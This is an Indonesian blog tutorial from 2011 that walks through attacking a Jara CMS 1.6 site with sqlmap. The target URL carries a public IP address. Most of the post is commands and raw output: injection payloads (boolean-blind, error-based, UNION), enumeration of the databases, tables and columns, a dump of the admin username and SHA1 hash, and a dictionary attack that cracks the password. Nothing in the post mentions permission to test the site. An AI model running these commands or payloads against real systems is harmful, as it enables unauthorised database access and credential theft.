Rabu, 26 Oktober 2011
Hacking SQL Injection pada suatu CMS dengan SQLmap
Di artikel sebelumnya penulis memberikan tutorial hacking SQL Injection secara manual, disini penulis memberikan tutorial menggunakan tool. Kita sebenarnya dapat menggunakan Havij, karena penggunaan cepat dan muda membuat penulis rasanya tidak seru jika hanya begitu simple.
Di sini penulis akan melakukan hacking dengan menggunakan SQLmap pada targetnya adalah CMS jara versi 1.6.
Kita dapat mencoba pertama-tama untuk mengetahui option-option dalam menggunakan SQLmap, cukup ketik python sqlmap.py -h lalu enter disitu akan muncul option-optionnya yang dapat digunakan sesuai dengan kebutuhan.
Ok, kita langsung mencoba prakteknya, untuk awal kita melakukan route map dahulu dengan melakukan fetch banner.
C:\sqlmap\sqlmap>python sqlmap.py -u “http://180.254.99.68/web/view.php?id=1″ –r
andom-agent –threads 10 –banner
sqlmap/0.9 – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 06:28:08
[06:28:08] [INFO] fetched random HTTP User-Agent header from file ‘C:\sqlmap\sql
map\txt\user-agents.txt’: Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.2.10) Geck
o/20100914 SUSE/3.6.10-0.3.1 Firefox/3.6.10
[06:28:08] [INFO] using ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’ as sessio
n file
[06:28:08] [INFO] resuming injection data from session file
[06:28:08] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[06:28:08] [INFO] testing connection to the target url
[06:28:29] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
—
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 1748=1748 AND ‘rjIZ’='rjIZ
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 1828 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,101,
115,58),(SELECT (CASE WHEN (1828=1828) THEN 1 ELSE 0 END)),CHAR(58,111,104,103,5
8),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ‘VSIx’='V
SIx
Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=-9318′ UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONC
AT(CHAR(58,119,101,115,58),IFNULL(CAST(CHAR(115,119,81,71,68,119,120,102,119,120
) AS CHAR),CHAR(32)),CHAR(58,111,104,103,58))# AND ‘qlpy’='qlpy
—
[06:28:31] [INFO] the back-end DBMS is MySQL
[06:28:31] [INFO] fetching banner
[06:28:31] [INFO] read from file ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’:
5.0.51b-community
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
banner: ’5.0.51b-community’
[06:28:31] [INFO] Fetched data logged to text files under ‘C:\sqlmap\sqlmap\outp
ut\180.254.99.68′
[*] shutting down at: 06:28:31
C:\sqlmap\sqlmap>
Dari fetch banner diatas kita mengetahui informasi tentang server.
Langkah berikutnya kita melakukan analisis user dan dbmsnya.
C:\sqlmap\sqlmap>python sqlmap.py -u “http://180.254.99.68/web/view.php?id=1″ –r
andom-agent –threads 10 –current-user –current-db
sqlmap/0.9 – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 06:33:34
[06:33:34] [INFO] fetched random HTTP User-Agent header from file ‘C:\sqlmap\sql
map\txt\user-agents.txt’: Opera/9.52 (Macintosh; PPC Mac OS X; U; fr)
[06:33:34] [INFO] using ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’ as sessio
n file
[06:33:34] [INFO] resuming injection data from session file
[06:33:34] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[06:33:34] [INFO] testing connection to the target url
[06:33:55] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
—
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 1748=1748 AND ‘rjIZ’='rjIZ
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 1828 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,101,
115,58),(SELECT (CASE WHEN (1828=1828) THEN 1 ELSE 0 END)),CHAR(58,111,104,103,5
8),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ‘VSIx’='V
SIx
Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=-9318′ UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONC
AT(CHAR(58,119,101,115,58),IFNULL(CAST(CHAR(115,119,81,71,68,119,120,102,119,120
) AS CHAR),CHAR(32)),CHAR(58,111,104,103,58))# AND ‘qlpy’='qlpy
—
[06:33:57] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[06:33:57] [INFO] fetching current user
current user: ‘root@localhost’
[06:33:58] [INFO] fetching current database
current database: ‘web’
[06:33:58] [INFO] Fetched data logged to text files under ‘C:\sqlmap\sqlmap\outp
ut\180.254.99.68′
[*] shutting down at: 06:33:58
C:\sqlmap\sqlmap>
Kita mendapatkan user yang menghandle dbms tersebut.
Selanjutnya kita akan menampilkan daftar database yang ada diserver, perintahnya
C:\sqlmap\sqlmap>python sqlmap.py -u “http://180.254.99.68/web/view.php?id=1″ –r
andom-agent –threads 10 –dbs
sqlmap/0.9 – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 06:36:58
[06:36:58] [INFO] fetched random HTTP User-Agent header from file ‘C:\sqlmap\sql
map\txt\user-agents.txt’: Mozilla/4.0 (compatible; MSIE 8.0; X11; Linux x86_64;
de) Opera 10.62
[06:36:58] [INFO] using ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’ as sessio
n file
[06:36:58] [INFO] resuming injection data from session file
[06:36:58] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[06:36:58] [INFO] testing connection to the target url
[06:37:19] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
—
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 1748=1748 AND ‘rjIZ’='rjIZ
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 1828 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,101,
115,58),(SELECT (CASE WHEN (1828=1828) THEN 1 ELSE 0 END)),CHAR(58,111,104,103,5
8),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ‘VSIx’='V
SIx
Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=-9318′ UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONC
AT(CHAR(58,119,101,115,58),IFNULL(CAST(CHAR(115,119,81,71,68,119,120,102,119,120
) AS CHAR),CHAR(32)),CHAR(58,111,104,103,58))# AND ‘qlpy’='qlpy
—
[06:37:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[06:37:24] [INFO] fetching database names
[06:37:25] [INFO] read from file ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’:
information_schema, blog2, cdcol, dodol, jcowx, mypc, mysql, phpmyadmin, social
, test, web, webauth
available databases [12]:
[*] blog2
[*] cdcol
[*] dodol
[*] information_schema
[*] jcowx
[*] mypc
[*] mysql
[*] phpmyadmin
[*] social
[*] test
[*] web
[*] webauth
[06:37:25] [INFO] Fetched data logged to text files under ‘C:\sqlmap\sqlmap\outp
ut\180.254.99.68′
[*] shutting down at: 06:37:25
C:\sqlmap\sqlmap>
Ternyata target mempunyai database yang cukup banyak, kita tetap pada target kita yaitu database web.
C:\sqlmap\sqlmap>python sqlmap.py -u “http://180.254.99.68/web/view.php?id=1″ –r
andom-agent –threads 10 -D web –tables
sqlmap/0.9 – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 06:41:40
[06:41:40] [INFO] fetched random HTTP User-Agent header from file ‘C:\sqlmap\sql
map\txt\user-agents.txt’: Mozilla/5.0 (X11; U; Linux x86_64; zh-TW; rv:1.9.0.13)
Gecko/2009080315 Ubuntu/9.04 (jaunty) Firefox/3.0.13
[06:41:41] [INFO] using ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’ as sessio
n file
[06:41:41] [INFO] resuming injection data from session file
[06:41:41] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[06:41:41] [INFO] testing connection to the target url
[06:42:02] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
—
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 1748=1748 AND ‘rjIZ’='rjIZ
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 1828 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,101,
115,58),(SELECT (CASE WHEN (1828=1828) THEN 1 ELSE 0 END)),CHAR(58,111,104,103,5
8),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ‘VSIx’='V
SIx
Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=-9318′ UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONC
AT(CHAR(58,119,101,115,58),IFNULL(CAST(CHAR(115,119,81,71,68,119,120,102,119,120
) AS CHAR),CHAR(32)),CHAR(58,111,104,103,58))# AND ‘qlpy’='qlpy
—
[06:42:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[06:42:03] [INFO] fetching tables for database ‘web’
[06:42:03] [INFO] read from file ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’:
web, jara_categories, web, jara_comments, web, jara_pages, web, jara_posts, web
, jara_settings, web, jara_users
Database: web
[6 tables]
+—————–+
| jara_categories |
| jara_comments |
| jara_pages |
| jara_posts |
| jara_settings |
| jara_users |
+—————–+
[06:42:03] [INFO] Fetched data logged to text files under ‘C:\sqlmap\sqlmap\outp
ut\180.254.99.68′
[*] shutting down at: 06:42:03
Setelah kita mengetahui table-tablenya, kita coba explore username dan passwordnya, disini penulis tebak ada di jara_users
C:\sqlmap\sqlmap>python sqlmap.py -u “http://180.254.99.68/web/view.php?id=1″ –r
andom-agent –threads 10 -D web -T jara_users –columns
sqlmap/0.9 – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 06:44:12
[06:44:13] [INFO] fetched random HTTP User-Agent header from file ‘C:\sqlmap\sql
map\txt\user-agents.txt’: Opera/9.80 (X11; Linux i686; U; it) Presto/2.5.24 Vers
ion/10.54
[06:44:13] [INFO] using ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’ as sessio
n file
[06:44:13] [INFO] resuming injection data from session file
[06:44:13] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[06:44:13] [INFO] testing connection to the target url
[06:44:34] [CRITICAL] unable to connect to the target url or proxy, sqlmap is go
ing to retry the request
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
—
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 1748=1748 AND ‘rjIZ’='rjIZ
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 1828 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,101,
115,58),(SELECT (CASE WHEN (1828=1828) THEN 1 ELSE 0 END)),CHAR(58,111,104,103,5
8),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ‘VSIx’='V
SIx
Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=-9318′ UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONC
AT(CHAR(58,119,101,115,58),IFNULL(CAST(CHAR(115,119,81,71,68,119,120,102,119,120
) AS CHAR),CHAR(32)),CHAR(58,111,104,103,58))# AND ‘qlpy’='qlpy
—
[06:44:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[06:44:35] [INFO] fetching columns for table ‘jara_users’ on database ‘web’
[06:44:35] [INFO] read from file ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’:
id, int(11), username, varchar(24), password, varchar(41), permission_posts, in
t(11), permission_pages, int(11), permission_users, int(11), permission_upload,
int(11)
Database: web
Table: jara_users
[7 columns]
+——————-+————-+
| Column | Type |
+——————-+————-+
| id | int(11) |
| password | varchar(41) |
| permission_pages | int(11) |
| permission_posts | int(11) |
| permission_upload | int(11) |
| permission_users | int(11) |
| username | varchar(24) |
+——————-+————-+
[06:44:35] [INFO] Fetched data logged to text files under ‘C:\sqlmap\sqlmap\outp
ut\180.254.99.68′
[*] shutting down at: 06:44:35
C:\sqlmap\sqlmap>
Hihi ternyata benar ada di table jara_users, sekarang tinggal kita lihat username dan passwordnya yang dimana di SQLMap ini
akan otomatis mencoba mengarahkan untuk dictionary attack jika passwordnya dienkripsi. Perintahnya :
C:\sqlmap\sqlmap>python sqlmap.py -u “http://180.254.99.68/web/view.php?id=1″ –r
andom-agent –threads 10 -D web -T jara_users -C username,password –dump
sqlmap/0.9 – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 06:22:31
[06:22:31] [INFO] fetched random HTTP User-Agent header from file ‘C:\sqlmap\sql
map\txt\user-agents.txt’: Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.
3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)
[06:22:31] [INFO] using ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’ as sessio
n file
[06:22:31] [INFO] resuming injection data from session file
[06:22:31] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[06:22:32] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
—
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1′ AND 1748=1748 AND ‘rjIZ’='rjIZ
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1′ AND (SELECT 1828 FROM(SELECT COUNT(*),CONCAT(CHAR(58,119,101,
115,58),(SELECT (CASE WHEN (1828=1828) THEN 1 ELSE 0 END)),CHAR(58,111,104,103,5
8),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND ‘VSIx’='V
SIx
Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=-9318′ UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CONC
AT(CHAR(58,119,101,115,58),IFNULL(CAST(CHAR(115,119,81,71,68,119,120,102,119,120
) AS CHAR),CHAR(32)),CHAR(58,111,104,103,58))# AND ‘qlpy’='qlpy
—
[06:22:32] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
[06:22:32] [INFO] fetching columns ‘username, password’ entries for table ‘jara_
users’ on database ‘web’
[06:22:32] [INFO] read from file ‘C:\sqlmap\sqlmap\output\180.254.99.68\session’:
admin, ba856797a6ed7651c7e6965efeead66cb632f0a5
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
[06:22:36] [INFO] using hash method: ‘sha1_generic_passwd’
what’s the dictionary’s location? [C:\sqlmap\sqlmap\txt\wordlist.txt] d:\passwor
d.txt
[06:23:37] [INFO] loading dictionary from: ‘d:\password.txt’
do you want to use common password suffixes? (slow!) [y/N] y
[06:23:44] [INFO] starting dictionary attack (sha1_generic_passwd)
[06:23:44] [INFO] found: ‘butterfly’ for user: ‘admin’
[06:23:44] [CRITICAL] there has been a file opening error for filename ‘C:\sqlma
p\sqlmap\output\180.254.99.68\dump\web\jara_users.csv’. Please check write permis
sions on a file and that it’s not locked by another process.
[*] shutting down at: 06:23:44
C:\sqlmap\sqlmap>
Binggo kita mendapatkan usernamenya yaitu admin dan passwordnya yaitu butterfly.
Langganan:
Posting Komentar (Atom)
0 komentar:
Posting Komentar